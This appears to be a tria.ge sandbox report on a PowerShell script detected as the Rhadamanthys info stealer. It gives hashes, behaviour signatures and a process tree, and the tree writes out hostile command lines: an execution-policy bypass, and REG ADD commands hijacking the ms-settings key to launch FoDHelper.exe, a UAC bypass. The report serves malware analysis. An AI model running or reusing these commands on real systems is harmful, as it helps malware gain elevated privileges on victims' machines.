Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
103s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
25/03/2025, 21:25
General
-
Target
update.ps1
-
Size
49KB
-
MD5
7939a13a1cfe5e697d4db5eac4a63ecf
-
SHA1
334411a10172046f3f71c444502ffe42e3e8af61
-
SHA256
9ac86db17423b057b502f64005f6f6f3ecafcac65f3d9099dad6a79908bd7bf1
-
SHA512
294a4afb4878e01c14732de30e4827b9cef695dfab0fbe7f80b2b16bf6adf1a76f198092dd579bde8101248b1d0fc5e16daa68adee929dc624f2c71cda5c121f
-
SSDEEP
1536:R5MXBuH/FWb8dnhLBh0RqW9KbApkRCqUh+TqG305b+:cBK/FfpFByRJ8CPh+T30l+
Malware Config
Signatures
-
Detects Rhadamanthys payload 1 IoCs
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file 1 IoCs
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 5 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry class 30 IoCs
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 60 IoCs
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\update.ps11⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\Admin\AppData\Local\Temp\r.bat" /F3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F3⤵
- Modifies registry class
-
-
C:\Windows\system32\fodhelper.exeFoDHelper.exe3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\r.bat"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -w 1 -ep Unrestricted -nop6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F3⤵
- Modifies registry class
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\Admin\AppData\Local\Temp\r.bat" /F3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F3⤵
- Modifies registry class
-
-
C:\Windows\system32\fodhelper.exeFoDHelper.exe3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r.bat" "4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\r.bat"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\MGLQZEXL.exeC:\Users\Admin\AppData\Roaming\MGLQZEXL.exe6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\TEMP\{AAF621B1-28C7-4BA2-876A-D2F95840FAE3}\.cr\MGLQZEXL.exe"C:\Windows\TEMP\{AAF621B1-28C7-4BA2-876A-D2F95840FAE3}\.cr\MGLQZEXL.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\MGLQZEXL.exe" -burn.filehandle.attached=620 -burn.filehandle.self=6167⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\TEMP\{DFF517F8-CB69-456A-BEF4-36363051AE28}\.ba\ABUsbTips.exeC:\Windows\TEMP\{DFF517F8-CB69-456A-BEF4-36363051AE28}\.ba\ABUsbTips.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\ChannelCtrlea\ABUsbTips.exeC:\Users\Admin\AppData\Roaming\ChannelCtrlea\ABUsbTips.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe10⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe10⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F3⤵
- Modifies registry class
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD59156092dd1b3ce8855dec5f167e42bfa
SHA1314ced05ac49a5e9fa56ab694686ceded827d92d
SHA256d36fc5dffe58535fa0d7cd8452bc1f07b3c8b87015d4b1a26c8a53681d5dc149
SHA51222ed0a2210c0c743ae38565298c86e617ad5c7b6c150b3f6c4b102597714207ff6e0948a181c3a87883eba7b5b8e04647c7ced8a44975f563dc5634817fadc43
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
149B
MD50f84366fc36d1a7d4c09b2c4befe943c
SHA1c58f6a2f702ae864028a1d61a8667228f8f02f20
SHA256758921052b7393ae459dc38787c7f9f24af946779e22154b2eb871f4eba26b27
SHA5121b5cc74aeaa4853d759d43e1fd2915069ad06259a6d3646cbf46c115396e3eaf05e9ef9c81da89ebae4a83e51c5e0d848f41fca7815cfb94a1450f50cb19c413
-
Filesize
150B
MD520a1d93d3cc4f31aa320af495413fc18
SHA10b0a674dc2f4386df22f2ba6e4ed3ac849fbbc10
SHA2560524dde0ac5002a218bad75ae27784fb2d7dbf5ae71684de800ed3fdfe942414
SHA5129436af9aa92a864ed05b21d4dd83db65c5bf70b9746171b075b60bf09215166ffc20b0c8e11ab744d276a2ed36ebf906edf3729357f5aeb8401f3451512cb946
-
Filesize
6.1MB
MD5d4298d078abec0c15f38cb12b5744f05
SHA1fa8ce6c790d8a501694e043144e496a32a6b9d95
SHA2566b0c3b9e50dc934181e200e08955f91f327f4d3943fb3969453980cb7db8e286
SHA5125d9513cf8fa4a21c514c880a139c9315fc1cad3308b26488163107b8cf3d1baccc04f6abb3bf6d63e43cc662f531e0ee9fefe2e08c44a5744e76375cabe4fd95
-
Filesize
2.3MB
MD550e660d1758f22e62e9f2375f7ddf7cf
SHA1953409a559e93c3e73e495c8b42ad29d4c5efb2f
SHA25690072b4b89d91357fe04ddfd74e09d518a5830ea98e38dd952949b5b67eadcde
SHA51285f1f1d590a93b897c9b5a73a6f81d92e7a7a38a137210bedafb597bcd0f0ff8a08ed31aea434e696193d6102504b0e3da4e0849a4f1dd556dce5058db2b14af
-
Filesize
8.2MB
MD59c8147773d84f4960aac909f324cb236
SHA1813f71ce6004b9e124890413601b808e42b4e72c
SHA256fd288b6cc0e7fabb7eb5e4d38e4f768c68b3067ef7f193185dcc7eaea6604853
SHA512230701e1a8d4103d22e421f76c7259a87e6f76a24792dab1eed4762529cc70f7e9c49d411b13fac083ec169a296fd14eadc685227a94875c8720b44046e3d32d
-
Filesize
1.6MB
MD57de247d270299360405d54226433661f
SHA17db33b2793ffd9d0da2fe8fa731fa390ee0fa900
SHA2569d6e57bd034d43182cb0ccf976a17fc1c431dc72c3c9b1a9ef605bae57cd80af
SHA5127a0488388eae63c8f84fe3aa4caa9fa693cfb5025804f0ebb73bac372938eabda792609742cf74e30014733aa8d97c897fd74ef0e187af4a9f4f08c4e6421cfd
-
Filesize
536KB
MD5272a9e637adcaf30b34ea184f4852836
SHA16de8a52a565f813f8ac7362e0c8ba334b680f8f8
SHA25635b15b78c31111db4fa11d9c9cad3a6f22c92daa5e6f069dc455e72073266cc4
SHA512f1f04a84d25a74bb1cf6285ef705f092a08e93d39df569f6badc45b8722d496bbbef02b4e19f76a0332e3842945506c2c12ad61fe34f339bb91f49b8d112cd52
-
Filesize
612KB
MD543143abb001d4211fab627c136124a44
SHA1edb99760ae04bfe68aaacf34eb0287a3c10ec885
SHA256cb8928ff2faf2921b1eddc267dce1bb64e6fee4d15b68cd32588e0f3be116b03
SHA512ced96ca5d1e2573dbf21875cf98a8fcb86b5bcdca4c041680a9cb87374378e04835f02ab569d5243608c68feb2e9b30ffe39feb598f5081261a57d1ce97556a6
-
Filesize
6.1MB
MD52e418b0bd508b24cbd2e14cf1c70b968
SHA170c493426af3b52d5555e91ff2f8dde408535606
SHA25664e39924acda5020cd9b5f20cb124a6e27e620d8e8a1e135f9ba2b62fbd43eb5
SHA512f570b0261ef535e1b006ff4d505b9f360b35ad9e959a3f50e1a4e7388259fbb5e60fc401b90b01fea4e34fe5715514040f1b8b2c778f1b38b22cd9f491bc6dce
-
Filesize
527KB
MD51ca8ed406d7a61b803bb7d81f3b76a0c
SHA15a44ef253ec3c1e384ebd414258ce24bcd5233e7
SHA2562a60e8ec6263352b42e8a0229cb872c07d1ebaf76015a206a98c9cfc98e0fd2f
SHA512ba654d7fbafa61e877d018cfe33248995ae964c85a042ce3402a404471b4df2827f737964cf044f70e01fd28329d8214417b010c64e5905e3aa7d5274b24ce46
-
Filesize
367KB
MD546d182e5d87eee203822741a5663874a
SHA18f0fdda3d5f470cf21db4b913ec199d0323b98b2
SHA2560d1994911b5185f3cd07cb716ac04a28d80ed7d6e1a1d0f701cff69b6974bd34
SHA5121615fa46b45dc2b826590ae191e13bc83c4f7c022139aa406dd5345e0507167691c00ec4c66de016084c445f08e0c5077e8482ee40f415b7465f92e96f813b92
-
Filesize
50KB
MD5a1e0074721f205b22ec317b4d992a1d9
SHA1faa12f90f9f3c7e5a0591298eb9c88113c41818d
SHA256be0f85ec95ca981eb7cb35c13716cdca3b67b6c2916fc9e485369ab40073d204
SHA512256c38b28c424a7d8234a7915d42672fbac2821a9d30dc461936083651764733ebb1b4312e34eb80c513e76c6b913d14becdc88655661ad63016d41ba8529ee7
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
272KB
-
Filesize
472KB
-
Filesize
316KB
-
Filesize
316KB
-
Filesize
2.0MB
-
Filesize
4.0MB
-
Filesize
2.0MB
-
Filesize
1.1MB
-
Filesize
32KB
-
Filesize
64KB
-
Filesize
4.0MB
-
Filesize
2.1MB
-
Filesize
2.6MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
316KB
-
Filesize
40KB
-
Filesize
4.0MB
-
Filesize
2.0MB
-
Filesize
2.1MB